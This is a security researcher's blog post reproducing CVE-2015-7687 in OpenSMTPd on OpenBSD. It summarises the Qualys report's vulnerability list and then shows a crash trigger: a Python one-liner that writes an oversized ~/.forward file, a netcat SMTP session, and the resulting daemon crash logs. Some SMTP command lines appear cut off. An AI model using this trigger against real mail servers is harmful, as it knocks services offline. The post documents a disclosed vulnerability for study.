Skip to content

CVE-2015-7687 OpenSMTPd trigger on OpenBSD

The below asciinema shows the triggering of the remote overflow (http://seclists.org/oss-sec/2015/q4/17) reported in OpenSMTPd this year 2015.

It is worth to mention The Qualys report, which as it includes interesting information about several reported vulnerabilities, being the most interesting ones the below list:

  • A version of fgetln() that allows attackers to read and write out-of-bounds memory
  • A stack-based buffer overflow that allows local users to crash OpenSMTPD, or execute arbitrary code as the non-chrooted _smtpd user
  • A hardlink attack that allows local users to read the first line of arbitrary files (for example, root’s hash from /etc/master.passwd)
  • An out-of-bounds memory read that allows remote attackers to crash OpenSMTPD, or leak information and defeat the ASLR protection
  • A use-after-free vulnerability that allows remote attackers to crash OpenSMTPD, or execute arbitrary code as the non-chrooted _smtpd user
  • Aultiple inter-process vulnerabilities that allow attackers to escalate from one (already-compromised) OpenSMTPD process to another

In order to trigger the issue, a user needs to setup a mail forwarding rule. To setup a forward in OpenSMTPd at user level, a file .forward must exist in the user’s home directory.

$ python -c 'print "/" * 1014 + "%{sender}"' > ~/.forward
  1. Log-in via SSH/tty using a regular user account
  2. Setup the mail forward filter using ~/.forward
  3. Connect to the smtpd using netcat (or telnet, or whatever)
  4. Issue the sequences: “HELO 127.0.0.1”, “MAIL FROM:<`255xA`@`255xA`>” and “RCPT TO:

The following shows a console log excerpt triggering the issue on a local OpenBSD mail server.

$ nc -v 127.0.0.1 25
Connection to 127.0.0.1 25 port [tcp/smtp] succeeded!
220 mail.prod.libcrack.so ESMTP OpenSMTPD
EHLO 127.0.0.1
250-mail.prod.libcrack.so Hello 127.0.0.1 [127.0.0.1], pleased to meet you
250-8BITMIME
250-ENHANCEDSTATUSCODES
250-SIZE 52428800
250-DSN
250 HELP
MAIL FROM:
250 2.0.0: Ok
RCPT TO:

The smtpd will die after the last “RCPT TO” sentence. This can be seen by inspecting the system logs:

Oct 5 11:50:15 mail smtpd[2731]: warn: format string error while expanding for user user
Oct 5 11:50:15 mail smtpd[25366]: warn: parent -> lka: pipe closed
Oct 5 11:50:15 mail smtpd[12226]: warn: pony -> lka: pipe closed
Oct 5 11:50:15 mail smtpd[4936]: warn: ca -> parent: pipe closed
Oct 5 11:50:15 mail smtpd[14187]: warn: queue -> lka: pipe closed
Oct 5 11:50:15 mail smtpd[17735]: warn: scheduler -> queue: pipe closed
Oct 5 11:50:15 mail smtpd[1602]: warn: control -> lka: pipe closed

The below asciinema shows the exploitation of this issue.

I’ll wrote a post about the exploitation details as soon as I have some spare time 🙂

Published invulnerability